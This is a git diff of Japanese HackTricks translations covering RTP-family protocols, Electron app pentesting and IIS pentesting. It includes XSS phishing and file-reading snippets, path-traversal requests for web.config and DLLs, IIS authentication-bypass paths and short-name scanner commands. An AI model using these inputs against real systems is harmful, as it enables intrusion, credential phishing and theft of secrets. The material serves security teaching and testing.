2. **RTCP(Real-time Transport Control Protocol)**:RTCPは、RTPの補助プロトコルであり、**QoS(Quality of Service)の監視**やメディアストリームの送信に関するフィードバックを提供するために使用されます。RTPと同じ**RFC 3550**で定義されており、RTCPは**定期的にRTPセッションの参加者間で制御パケットを交換**します。パケット損失、ジッター、ラウンドトリップタイムなどの情報を共有し、ネットワークの状況を診断し適応するのに役立ち、全体的なメディア品質を向上させます。
|
||||
3. **SRTP(Secure Real-time Transport Protocol)**:SRTPは、メディアストリームの**暗号化**、**メッセージ認証**、および**リプレイ保護**を提供するRTPの拡張機能で、機密性の高いオーディオやビデオデータの安全な送信を保証します。**RFC 3711**で定義されており、SRTPは暗号化にAESなどの暗号アルゴリズム、メッセージ認証にHMAC-SHA1などの暗号アルゴリズムを使用します。SRTPは、多くの場合、SIP over TLSなどのセキュアなシグナリングプロトコルと組み合わせて使用され、マルチメディア通信におけるエンドツーエンドのセキュリティを提供します。
|
||||
4. **ZRTP(Zimmermann Real-time Transport Protocol)**:ZRTPは、RTPメディアストリームの**エンドツーエンドの暗号化**を提供する暗号鍵合意プロトコルです。PGPの作成者であるPhil Zimmermannによって開発され、**RFC 6189**で説明されています。シグナリングプロトコルに鍵交換を依存するSRTPとは異なり、ZRTPはシグナリングプロトコルとは独立して動作するように設計されています。通信する各当事者間で共有秘密を確立するために**Diffie-Hellman鍵交換**を使用し、事前の信頼や公開鍵インフラストラクチャ(PKI)を必要としません。ZRTPには、**中間者攻撃に対する保護**として**Short Authentication Strings(SAS)**などの機能も含まれています。
|
||||
|
||||
これらのプロトコルは、IPネットワーク上での**リアルタイムマルチメディア通信の提供と保護**において重要な役割を果たします。RTPとRTCPは実際のメディア伝送と品質監視を担当し、SRTPとZRTPは、伝送されるメディアが盗聴、改ざん、およびリプレイ攻撃から保護されることを確保します。
|
||||
これらのプロトコルは、IPネットワーク上での**リアルタイムマルチメディア通信の配信とセキュリティ確保**において重要な役割を果たします。RTPとRTCPは実際のメディア伝送と品質監視を担当し、SRTPとZRTPは、送信されるメディアが盗聴、改ざん、およびリプレイ攻撃から保護されることを確保します。
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**ゼロからヒーローまでAWSハッキングを学ぶ** <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>**ゼロからヒーローまでAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
- **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -28,9 +28,9 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
---
|
||||
|
||||
## Introduction
|
||||
## はじめに
|
||||
|
||||
Electronは、ローカルバックエンド(**NodeJS**)とフロントエンド(**Chromium**)を組み合わせていますが、現代のブラウザのセキュリティメカニズムがいくつか欠けています。
|
||||
Electronは、ローカルバックエンド(**NodeJS**を使用)とフロントエンド(**Chromium**を使用)を組み合わせていますが、現代のブラウザのセキュリティメカニズムが欠けています。
|
||||
|
||||
通常、Electronアプリのコードは`.asar`アプリケーション内にあり、コードを取得するにはそれを抽出する必要があります:
|
||||
```bash
|
||||
|
@ -50,7 +50,7 @@ Electronには2つのプロセスタイプがあります:
|
|||
|
||||
![](<../../../.gitbook/assets/image (179).png>)
|
||||
|
||||
**レンダラープロセス**はファイルを読み込むブラウザウィンドウになります:
|
||||
**レンダラープロセス**はファイルをロードするブラウザウィンドウになります:
|
||||
```javascript
|
||||
const {BrowserWindow} = require('electron');
|
||||
let win = new BrowserWindow();
|
||||
|
@ -58,7 +58,7 @@ let win = new BrowserWindow();
|
|||
//Open Renderer Process
|
||||
win.loadURL(`file://path/to/index.html`);
|
||||
```
|
||||
**レンダラープロセス**の設定は、main.jsファイル内の**メインプロセス**で**構成できます**。設定が**正しく構成されている**場合、いくつかの構成はElectronアプリケーションがRCEを取得するのを**防ぎます**。
|
||||
**レンダラープロセス**の設定は、main.jsファイル内の**メインプロセス**で**構成**できます。設定が正しく構成されている場合、いくつかの構成は、ElectronアプリケーションがRCEを取得したり、他の脆弱性を取得するのを**防ぐ**ことができます。
|
||||
|
||||
Electronアプリケーションは、Node APIを介してデバイスにアクセスできますが、それを防ぐように構成できます:
|
||||
|
||||
|
@ -68,8 +68,8 @@ Electronアプリケーションは、Node APIを介してデバイスにアク
|
|||
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - デフォルトではオフです。これにより、NodeJSが実行できるアクションが制限されます。
|
||||
- WorkersでのNode Integration
|
||||
- **`nodeIntegrationInSubframes`** - デフォルトでは`off`です。
|
||||
- **`nodeIntegration`**が**有効**になっている場合、これによりElectronアプリケーション内の**iframe**に読み込まれるWebページで**Node.js API**を使用できます。
|
||||
- **`nodeIntegration`**が**無効**になっている場合、プリロードはiframe内に読み込まれます。
|
||||
- **`nodeIntegration`**が**有効**になっている場合、これにより、Electronアプリケーション内のiframeに**読み込まれるWebページ**で**Node.js API**を使用できます。
|
||||
- **`nodeIntegration`**が**無効**になっている場合、プリロードはiframe内で読み込まれます。
|
||||
|
||||
構成の例:
|
||||
```javascript
|
||||
|
@ -178,12 +178,12 @@ _**contextIsolation**_ は、**Web ページのスクリプトと JavaScript Ele
|
|||
|
||||
コンテキストが分離されていない場合、攻撃者は次のことができます:
|
||||
|
||||
1. **レンダラー内で任意の JavaScript を実行**(XSS または外部サイトへのナビゲーション)
|
||||
2. preload または Electron の内部コードで使用される **組み込みメソッドを上書き**
|
||||
1. **レンダラー内で任意の JavaScript を実行**(XSS または外部サイトへの移動)
|
||||
2. preload または Electron の内部コードで使用される**組み込みメソッドを上書き**
|
||||
3. **上書きされた関数の使用をトリガー**
|
||||
4. RCE?
|
||||
|
||||
組み込みメソッドを上書きできる場所は 2 か所あります:preload コードまたは Electron の内部コード内:
|
||||
組み込みメソッドを上書きできる場所は 2 か所あります:preload コードまたは Electron の内部コード:
|
||||
|
||||
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
|
||||
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
|
||||
|
@ -199,7 +199,7 @@ _**contextIsolation**_ は、**Web ページのスクリプトと JavaScript Ele
|
|||
|
||||
### クリックイベントのバイパス
|
||||
|
||||
リンクをクリックする際に制限が適用されている場合、通常の左クリックではなく **中クリック** を行うことでそれらをバイパスできるかもしれません
|
||||
リンクをクリックする際に制限が適用されている場合、通常の左クリックではなく**中クリック**を行うことでそれらをバイパスできるかもしれません
|
||||
```javascript
|
||||
window.addEventListener('click', (e) => {
|
||||
```
|
||||
|
@ -209,12 +209,12 @@ window.addEventListener('click', (e) => {
|
|||
|
||||
Electronデスクトップアプリケーションを展開する際、`nodeIntegration`と`contextIsolation`の正しい設定を確保することが重要です。これらの設定が適切に行われている場合、preloadスクリプトやElectronのメインプロセスからの**クライアントサイドリモートコード実行(RCE)**が効果的に防止されることが確立されています。
|
||||
|
||||
ユーザーがリンクに対話したり新しいウィンドウを開いたりすると、特定のイベントリスナーがトリガーされ、これらはアプリケーションのセキュリティと機能性にとって重要です。
|
||||
ユーザーがリンクに対話したり新しいウィンドウを開いたりする際に、特定のイベントリスナーがトリガーされ、これらはアプリケーションのセキュリティと機能性にとって重要です。
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {}
|
||||
webContents.on("will-navigate", function (event, url) {}
|
||||
```
|
||||
これらのリスナーは、デスクトップアプリケーションによって**オーバーライド**され、独自の**ビジネスロジック**を実装します。アプリケーションは、ナビゲートされたリンクを内部で開くか外部のWebブラウザで開くかを評価します。この決定は通常、`openInternally`という関数を介して行われます。この関数が`false`を返すと、リンクは`shell.openExternal`関数を使用して外部で開かれるべきであることを示します。
|
||||
これらのリスナーは、デスクトップアプリケーションによって**オーバーライド**され、独自の**ビジネスロジック**を実装します。アプリケーションは、ナビゲートされたリンクを内部で開くか外部のWebブラウザで開くかを評価します。この決定は通常、`openInternally`という関数を介して行われます。この関数が`false`を返すと、リンクは外部で開かれるべきであり、`shell.openExternal`関数を利用します。
|
||||
|
||||
**以下は簡略化された疑似コードです:**
|
||||
|
||||
|
@ -222,7 +222,7 @@ webContents.on("will-navigate", function (event, url) {}
|
|||
|
||||
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
|
||||
|
||||
Electron JSのセキュリティベストプラクティスでは、`openExternal`関数で信頼されていないコンテンツを受け入れることを避けることが推奨されています。これは、さまざまなプロトコルを介してRCEにつながる可能性があるためです。オペレーティングシステムは、この脆弱性を悪用する可能性のあるさまざまなプロトコルをサポートしています。このトピックに関する詳細な例や説明については、[このリソース](https://positive.security/blog/url-open-rce#windows-10-19042)を参照してください。このリソースには、この脆弱性を悪用する可能性のあるWindowsプロトコルの例が含まれています。
|
||||
Electron JSのセキュリティベストプラクティスでは、`openExternal`関数を使用して信頼されていないコンテンツを受け入れることを避けることが推奨されています。これは、さまざまなプロトコルを介してRCEにつながる可能性があるためです。オペレーティングシステムは、この脆弱性を悪用する可能性のあるさまざまなプロトコルをサポートしています。このトピックに関する詳細な例や説明については、[このリソース](https://positive.security/blog/url-open-rce#windows-10-19042)を参照してください。このリソースには、この脆弱性を悪用できるWindowsプロトコルの例が含まれています。
|
||||
|
||||
**Windowsプロトコルの脆弱性の例には、次のものがあります:**
|
||||
```html
|
||||
|
@ -260,16 +260,16 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
|
|||
|
||||
## **内部 URL 正規表現バイパスを介した XSS フィッシング**
|
||||
|
||||
XSS を見つけたが、**RCE をトリガーできず内部ファイルを盗むことができない** 場合、それを使用して **フィッシングを通じて資格情報を盗む** ことを試してみることができます。
|
||||
XSS を見つけたが、**RCE をトリガーできず内部ファイルを盗むことができない** 場合、それを使用して **フィッシングを介して資格情報を盗む** ことを試してみることができます。
|
||||
|
||||
まず、新しい URL を開こうとすると何が起こるかを知るために、フロントエンドの JS コードをチェックする必要があります:
|
||||
まず、新しい URL を開こうとすると何が起こるかを知る必要があります。フロントエンドの JS コードをチェックしてください:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
|
||||
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
|
||||
```
|
||||
**`openInternally`**の呼び出しは、そのリンクがプラットフォームに属するリンクであるため、**デスクトップウィンドウ**で開かれるか、**サードパーティのリソースとして**ブラウザで開かれるかを決定します。
|
||||
|
||||
関数によって使用される**正規表現**が**バイパスに脆弱**である場合(たとえば、**サブドメインのドットをエスケープしていない**場合)、攻撃者はXSSを悪用して、**ユーザーに資格情報を要求する**攻撃者のインフラストラクチャにある**新しいウィンドウを開く**ことができます。
|
||||
関数によって使用される**正規表現**が**バイパスされやすい**場合(たとえば、**サブドメインのドットをエスケープしない**場合)、攻撃者はXSSを悪用して、ユーザーに**資格情報を要求する**攻撃者のインフラストラクチャにある**新しいウィンドウを開く**ことができます。
|
||||
```html
|
||||
<script>
|
||||
window.open("<http://subdomainagoogleq.com/index.html>")
|
||||
|
@ -277,7 +277,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
```
|
||||
## **ツール**
|
||||
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) は、Electronベースのアプリケーションでの設定ミスとセキュリティアンチパターンを特定するためのツールです。
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) は、Electronベースのアプリケーションでの設定ミスとセキュリティアンチパターンを特定するツールです。
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) は、Electronアプリケーション用のオープンソースのVS Codeプラグインで、Electronegativityを使用します。
|
||||
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) は、脆弱なサードパーティライブラリをチェックするためのツールです。
|
||||
* [**Electro.ng**](https://electro.ng/):購入が必要です
|
||||
|
@ -319,11 +319,11 @@ npm start
|
|||
* Electronセキュリティに関するさらなる研究と解説は[https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)で確認できます。
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -333,14 +333,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**を使って、ゼロからAWSハッキングをマスターしましょう</strong></summary>
|
||||
<summary><strong>**ゼロからヒーローまでのAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローする。**
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,23 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**</strong>を使って、**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>**を使って、ゼロからヒーローまでAWSハッキングを学ぶ**</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -37,7 +37,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 内部IPアドレスの漏洩
|
||||
|
||||
302を受け取る任意のIISサーバーで、Hostヘッダーを削除してHTTP/1.0を使用し、レスポンス内のLocationヘッダーが内部IPアドレスを指す可能性があります:
|
||||
302を受け取るIISサーバーでは、Hostヘッダーを削除してHTTP/1.0を使用し、レスポンス内のLocationヘッダーが内部IPアドレスを指す可能性があります:
|
||||
```
|
||||
nc -v domain.com 80
|
||||
openssl s_client -connect domain.com:443
|
||||
|
@ -55,13 +55,13 @@ X-FEServer: NHEXCHANGE2016
|
|||
```
|
||||
## .configファイルの実行
|
||||
|
||||
.configファイルをアップロードし、それらを使用してコードを実行することができます。これを行う方法の1つは、HTMLコメント内にコードをファイルの末尾に追加することです:[ここから例をダウンロード](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
.configファイルをアップロードしてコードを実行することができます。その方法の1つは、HTMLコメント内にコードをファイルの末尾に追加することです:[ここから例をダウンロード](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
|
||||
この脆弱性を悪用するための詳細情報やテクニックは[こちら](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)にあります。
|
||||
この脆弱性を悪用するための詳細な情報やテクニックは[こちら](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
||||
|
||||
## IISディスカバリーブルートフォース
|
||||
|
||||
私が作成したリストをダウンロードしてください:
|
||||
作成したリストをダウンロードしてください:
|
||||
|
||||
{% file src="../../.gitbook/assets/iisfinal.txt" %}
|
||||
|
||||
|
@ -74,7 +74,7 @@ X-FEServer: NHEXCHANGE2016
|
|||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
||||
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
||||
|
||||
拡張子を追加せずに使用してください。必要なファイルにはすでに追加されています。
|
||||
拡張子を追加せずに使用してください。必要なファイルにはすでに拡張子が付いています。
|
||||
|
||||
## パストラバーサル
|
||||
|
||||
|
@ -83,12 +83,12 @@ X-FEServer: NHEXCHANGE2016
|
|||
詳細な解説はこちらを参照してください:[https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
|
||||
{% hint style="info" %}
|
||||
要約すると、アプリケーションのフォルダ内には、"assemblyIdentity"ファイルと"namespaces"への参照が含まれる複数のweb.configファイルがあります。この情報を使用すると、**実行可能ファイルがどこにあるか**を知ることができます。\
|
||||
**ダウンロードしたDll**からは、**新しい名前空間**を見つけることができ、アクセスしてweb.configファイルを取得し、新しい名前空間とassemblyIdentityを見つけることができます。\
|
||||
また、ファイル**connectionstrings.config**と**global.asax**には興味深い情報が含まれているかもしれません。\\
|
||||
要約すると、アプリケーションのフォルダ内には、"assemblyIdentity"ファイルや"namespaces"への参照が含まれる複数のweb.configファイルがあります。この情報を使用すると、**実行可能ファイルがどこにあるか**を知ることができます。\
|
||||
**ダウンロードしたDlls**からは、**新しい名前空間**を見つけることができ、アクセスしてweb.configファイルを取得して新しい名前空間とassemblyIdentityを見つけることができます。\
|
||||
また、ファイル**connectionstrings.config**と**global.asax**には興味深い情報が含まれているかもしれません。\
|
||||
{% endhint %}
|
||||
|
||||
**.Net MVCアプリケーション**では、**web.config**ファイルが、**"assemblyIdentity"** XMLタグを介してアプリケーションが依存する各バイナリファイルを指定することで重要な役割を果たします。
|
||||
**.Net MVCアプリケーション**では、**web.config**ファイルが、**"assemblyIdentity"** XMLタグを介してアプリケーションが依存する各バイナリファイルを指定する重要な役割を果たします。
|
||||
|
||||
### **バイナリファイルの探索**
|
||||
|
||||
|
@ -105,15 +105,15 @@ Host: example-mvc-application.minded
|
|||
* **System.webServer** モジュールの設定
|
||||
* **Microsoft.Owin**、**Newtonsoft.Json**、**System.Web.Mvc** などの多くのライブラリに対する **Runtime** アセンブリのバインディング
|
||||
|
||||
これらの設定は、**/bin/WebGrease.dll** のような特定のファイルがアプリケーションの /bin フォルダに存在することを示しています。
|
||||
これらの設定により、**/bin/WebGrease.dll** などの特定のファイルがアプリケーションの /bin フォルダーに配置されていることが示されます。
|
||||
|
||||
### **ルートディレクトリのファイル**
|
||||
|
||||
**/global.asax** や**/connectionstrings.config**(機密性の高いパスワードが含まれる)など、ルートディレクトリにあるファイルは、アプリケーションの構成と動作に不可欠です。
|
||||
**/global.asax** や **/connectionstrings.config**(機密性の高いパスワードが含まれる)など、ルートディレクトリにあるファイルは、アプリケーションの構成と動作に不可欠です。
|
||||
|
||||
### **名前空間と Web.Config**
|
||||
|
||||
MVC アプリケーションでは、各ファイルで繰り返し宣言を避けるために、特定の名前空間用の追加の **web.config ファイル** も定義されます。別の **web.config** をダウンロードするリクエストの例が示されています。
|
||||
MVC アプリケーションでは、各ファイルでの繰り返し宣言を避けるために、特定の名前空間用の追加の **web.config ファイル** も定義されています。別の **web.config** をダウンロードするリクエストの例が示されています。
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
|
@ -127,7 +127,7 @@ Host: example-mvc-application.minded
|
|||
```
|
||||
これは、/binディレクトリに**System.Web.Mvc.dll**や**System.Web.Optimization.dll**などの他の重要なDLLが存在している可能性を示しています。
|
||||
|
||||
DLLが**WebApplication1.Areas.Minded**という名前空間をインポートするシナリオでは、攻撃者は他のweb.configファイルが予測可能なパス(たとえば**/area-name/Views/**)に存在し、/binフォルダ内の他のDLLへの参照や特定の構成を含む可能性があることを推測するかもしれません。例えば、**/Minded/Views/web.config**へのリクエストは、**WebApplication1.AdditionalFeatures.dll**という別のDLLの存在を示す構成と名前空間を明らかにする可能性があります。
|
||||
DLLが**WebApplication1.Areas.Minded**という名前空間をインポートするシナリオでは、攻撃者は他のweb.configファイルが予測可能なパス(たとえば**/area-name/Views/**)に存在することを推測する可能性があります。これらのweb.configファイルには/binフォルダ内の他のDLLへの特定の構成と参照が含まれています。たとえば、**/Minded/Views/web.config**へのリクエストは、別のDLLである**WebApplication1.AdditionalFeatures.dll**の存在を示す構成と名前空間を明らかにする可能性があります。
|
||||
|
||||
### 一般的なファイル
|
||||
|
||||
|
@ -217,26 +217,26 @@ C:\xampp\tomcat\conf\server.xml
|
|||
それはサーバーが**Hostヘッダー内に正しいドメイン名を受信しなかった**ことを意味します。\
|
||||
Webページにアクセスするためには、提供された**SSL証明書**を確認して、そこにドメイン/サブドメイン名が見つかるかもしれません。見つからない場合は、**正しいものを見つけるまでVHostsをブルートフォース**する必要があります。
|
||||
|
||||
## 古いIISの脆弱性の価値があるもの
|
||||
## 古いIISの脆弱性の価値がある
|
||||
|
||||
### Microsoft IISチルダ文字“\~”脆弱性/機能 – 短いファイル/フォルダ名の開示
|
||||
### Microsoft IISチルダ文字“\~”脆弱性/機能–短いファイル/フォルダ名の開示
|
||||
|
||||
この**技術**を使用して、発見された各フォルダ内のフォルダとファイルを**列挙**してみることができます(基本認証が必要な場合でも)。\
|
||||
この技術の主な制限は、サーバーが脆弱である場合に**各ファイル/フォルダの名前の最初の6文字とファイルの拡張子の最初の3文字までしか見つけることができない**ことです。
|
||||
|
||||
この脆弱性をテストするために[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)を使用できます:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||||
この脆弱性をテストするために[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)を使用できます:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||||
|
||||
![](<../../.gitbook/assets/image (841).png>)
|
||||
|
||||
元の研究: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
|
||||
元の研究:[https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
|
||||
|
||||
**Metasploit**も使用できます: `use scanner/http/iis_shortname_scanner`
|
||||
**Metasploit**も使用できます:`use scanner/http/iis_shortname_scanner`
|
||||
|
||||
### 基本認証バイパス
|
||||
|
||||
**基本認証(IIS 7.5)**をバイパスして、次のようにアクセスを試みます:`/admin:$i30:$INDEX_ALLOCATION/admin.php`または`/admin::$INDEX_ALLOCATION/admin.php`
|
||||
|
||||
この脆弱性と前述のものを**組み合わせて**、新しい**フォルダ**を見つけて**認証をバイパス**することができます。
|
||||
この脆弱性と前述のものを組み合わせて、新しい**フォルダ**を見つけて**認証をバイパス**することができます。
|
||||
|
||||
## ASP.NET Trace.AXD有効なデバッグ
|
||||
|
||||
|
@ -244,7 +244,7 @@ ASP.NETにはデバッグモードがあり、そのファイルは`trace.axd`
|
|||
|
||||
